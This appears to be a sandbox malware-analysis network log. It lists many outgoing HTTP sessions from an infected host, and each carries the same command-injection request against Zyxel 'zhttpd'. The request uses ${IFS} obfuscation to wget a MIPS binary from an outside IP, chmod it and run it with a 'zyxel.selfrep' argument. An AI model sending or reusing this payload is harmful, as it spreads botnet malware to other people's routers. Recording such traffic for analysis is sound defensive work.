                                    Jan 13, 2024 19:02:27.005006075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2578192.168.2.13479064.178.121.201443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.005079031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2579192.168.2.134831239.168.19.225443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.005151033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2580192.168.2.1358396100.53.65.228443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.005217075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2581192.168.2.135900285.122.70.134443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.005253077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2582192.168.2.1335354147.89.144.179443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.005305052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2583192.168.2.1345884146.82.208.120443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.005351067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2584192.168.2.1340978102.176.134.6443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.005438089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2585192.168.2.1347578121.151.160.70443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.005522013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2586192.168.2.133759660.5.141.211443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.005584002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2587192.168.2.1359782130.224.212.17443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.005633116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2588192.168.2.135053019.149.133.148443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.005742073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2589192.168.2.1354036137.12.170.173443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.005814075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2590192.168.2.1334114153.137.164.71443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.005839109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2591192.168.2.1340494122.230.207.195443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.005928993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2592192.168.2.134651035.233.37.219443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.005980968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2593192.168.2.1350022125.200.221.221443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.006057024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2594192.168.2.1349066223.135.187.253443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.006086111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2595192.168.2.1356304216.253.95.86443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.006143093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2596192.168.2.1351664153.202.137.174443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.006192923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2597192.168.2.135258435.32.148.238443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.006257057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2598192.168.2.1360184209.114.18.103443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.006313086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2599192.168.2.1355432143.21.110.7443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.006367922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2600192.168.2.1334952217.98.181.145443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.006438017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2601192.168.2.1342988202.252.173.35443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.006468058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2602192.168.2.1340200175.90.53.112443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.006530046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2603192.168.2.1346478109.18.163.208443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.006578922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2604192.168.2.134978239.1.208.52443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.006644011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2605192.168.2.1354084189.105.224.105443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.006683111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2606192.168.2.135622219.238.209.236443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.006747007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2607192.168.2.1348886191.89.174.4443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.006809950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2608192.168.2.1358414176.108.85.74443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.006879091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2609192.168.2.1358436121.210.100.246443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.006953001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2610192.168.2.134392425.191.65.147443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.007015944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2611192.168.2.1337738117.167.115.75443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.007070065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2612192.168.2.1358524223.59.147.164443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.007117987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2613192.168.2.1356926221.25.47.93443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.007174015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2614192.168.2.135383091.109.225.253443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.007230043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2615192.168.2.136046688.117.235.217443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.007287025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2616192.168.2.134190680.90.146.96443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.007360935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2617192.168.2.136058096.1.45.122443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.007405996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2618192.168.2.134608081.180.46.101443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.007467985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2619192.168.2.1358784162.207.166.116443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.007508039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2620192.168.2.1347402168.251.51.231443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.007589102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2621192.168.2.134644099.36.113.13443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.007635117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2622192.168.2.134396427.98.100.96443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.007695913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2623192.168.2.1337492174.197.40.227443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.007759094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2624192.168.2.134309470.119.27.161443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.007802963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2625192.168.2.133854863.221.55.237443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.007838011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2626192.168.2.134505464.254.40.16443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.007901907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2627192.168.2.133706298.136.241.181443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.007930040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2628192.168.2.1354580211.31.10.190443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.008006096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2629192.168.2.135431453.237.4.94443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.008057117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2630192.168.2.135461474.21.70.6443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.008093119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2631192.168.2.1353144205.165.199.37443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.008141994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2632192.168.2.135971676.185.247.249443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.008177042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2633192.168.2.1360750129.246.1.131443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.008244991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2634192.168.2.1337392201.245.196.21443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.008302927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2635192.168.2.1336428148.146.141.22443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.008369923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2636192.168.2.134656472.224.146.199443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.008425951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2637192.168.2.1358058139.161.213.168443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.008511066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2638192.168.2.1354354123.90.88.206443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.008593082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2639192.168.2.1338234209.100.132.196443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.008666992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2640192.168.2.1347976191.5.150.80443
                                    TimestampBytes transferredDirectionData
